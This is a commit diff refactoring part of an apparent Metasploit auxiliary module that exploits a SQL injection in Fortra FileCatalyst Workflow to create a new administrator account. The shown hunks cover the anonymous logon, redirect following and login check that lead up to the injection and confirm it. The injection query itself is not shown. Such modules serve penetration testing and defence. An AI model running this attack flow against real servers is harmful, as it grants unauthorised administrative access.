Code cleanup

h4x-x0r · h4x-x0r · commit 3577ae8ffb82 · 2024-08-16T13:57:38.000+01:00
Code cleanup
diff --git a/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb b/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb
@@ -80,13 +80,19 @@ def run
     end
 
     body = res.body
-    if body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
-      token_value = ::Regexp.last_match(1)
-      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
-    else
+    unless body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
       fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
     end
 
+    token_value = ::Regexp.last_match(1)
+    print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    # if body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+    #  token_value = ::Regexp.last_match(1)
+    #  print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    # else
+    #  fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    # end
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "workflow/logonAnonymous.do?FCWEB.FORM.TOKEN=#{token_value}"),
@@ -99,13 +105,13 @@ def run
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
 
-    if res.headers['Location']
-      location_value = res.headers['Location']
-      print_status("Redirect #1: #{location_value}")
-    else
+    unless res.headers['Location']
       fail_with(Failure::UnexpectedReply, 'Location header not found.')
     end
 
+    location_value = res.headers['Location']
+    print_status("Redirect #1: #{location_value}")
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, location_value.to_s),
@@ -118,13 +124,13 @@ def run
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
 
-    if res.headers['Location']
-      location_value = res.headers['Location']
-      print_status("Redirect #2: #{location_value}")
-    else
+    unless res.headers['Location']
       fail_with(Failure::UnexpectedReply, 'Location header not found.')
     end
 
+    location_value = res.headers['Location']
+    print_status("Redirect #2: #{location_value}")
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, location_value.to_s),
@@ -140,17 +146,17 @@ def run
     html = res.get_html_document
     h2_tag = html.at_css('h2')
 
-    if h2_tag
-      h2_text = h2_tag.text.strip
-      if h2_text == 'Choose an Order Type'
-        print_status('Received expected response.')
-      else
-        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag: ' + h2_text)
-      end
-    else
+    unless h2_tag
       fail_with(Failure::UnexpectedReply, 'h2 tag not found.')
     end
 
+    h2_text = h2_tag.text.strip
+    unless h2_text == 'Choose an Order Type'
+      fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag: ' + h2_text)
+    end
+
+    print_status('Received expected response.')
+
     t = Time.now
     username = datastore['NEW_USERNAME']
     password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
@@ -251,17 +257,16 @@ def run
     html = res.get_html_document
     title_block = html.at_css('.titleBlock')
 
-    if title_block
-      title_text = title_block.text.strip
-      if title_text.include?('Administration')
-        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
-        print_good('Login successful!')
-      else
-        fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
-      end
-    else
+    unless title_block
       fail_with(Failure::UnexpectedReply, 'Expected titleBlock not found.')
     end
+    title_text = title_block.text.strip
+
+    unless title_text.include?('Administration')
+      fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
+    end
+    store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+    print_good('Login successful!')
 
     print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
     print_good("Login at: #{full_uri(normalize_uri(target_uri, 'workflow/jsp/logon.jsp'))}")
